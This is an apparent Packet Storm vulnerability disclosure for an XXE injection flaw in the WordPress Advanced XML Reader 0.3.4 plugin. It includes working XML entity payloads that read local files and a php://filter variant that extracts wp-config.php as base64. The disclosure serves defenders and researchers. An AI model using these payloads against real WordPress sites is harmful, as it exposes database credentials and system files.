what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress Advanced XML Reader 0.3.4 XXE Injection

WordPress Advanced XML Reader 0.3.4 XXE Injection
Posted May 2, 2013
Authored by system_meltdown

WordPress Advanced XML Reader plugin version 0.3.4 suffers from a XXE (XML eXternal Entity) injection vulnerability.

tags | exploit, xxe
SHA-256 | 8f00f9b3232481b2651bd135bbb4cc1f273adbf09d9d0da522f46d08d53f898b

WordPress Advanced XML Reader 0.3.4 XXE Injection

Change Mirror Download
The WordPress plugin Advanced XML Reader v0.3.4 published here: http://wordpress.org/extend/plugins/advanced-xml-reader/ is susceptible to XXE (XML eXternal Entity) processing attacks.

After installing the plugin on a Windows machine, I created a text file in the root of C:\ named "test.txt", which contained the text "This is a test file". I then crafted an XML file named "test2.xml" which consisted of the following:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE foo [
<!ELEMENT test ANY >
<!ENTITY xxe SYSTEM "file:///c:/test.txt" >]>
<doc>
<test>Contents of C:\test.txt: &xxe;</test>
</doc>

As you can see, this XML document attempts to load "test.txt" into the entity &xee. Upon uploading this file to dropbox (http://dl.dropboxusercontent.com/u/5022066/test2.xml), I proceeded to enter the address into the field on the plugin page and saved the settings. This gave me the tag to use: [advanced-xml tag="test"]

Following this, I created a new post with the short tag, and the contents of the post once saved was "Contents of C:\test.txt: This is a test file", indicating that reading a file was possible.

Theoretically, should an attacker be able to obtain the privileges needed to update the settings and create a post, he or she could potentially exploit this vulnerability to read system files, such as /etc/passwd on a Linux server. Also, using PHP wrappers, it is possible to load the wp-config.php file, using this:

<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=file:///c:/htdocs/wordpress/wp-config.php" >]>

This encodes the file into Base64, which can then be decoded via a service such as http://www.base64decode.org/ to the plaintext of the WordPress configuration file.

Here is a video PoC: http://youtu.be/bC7Rb268i28
Login or Register to add favorites

File Archive:

December 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    2 Files
  • 2
    Dec 2nd
    12 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close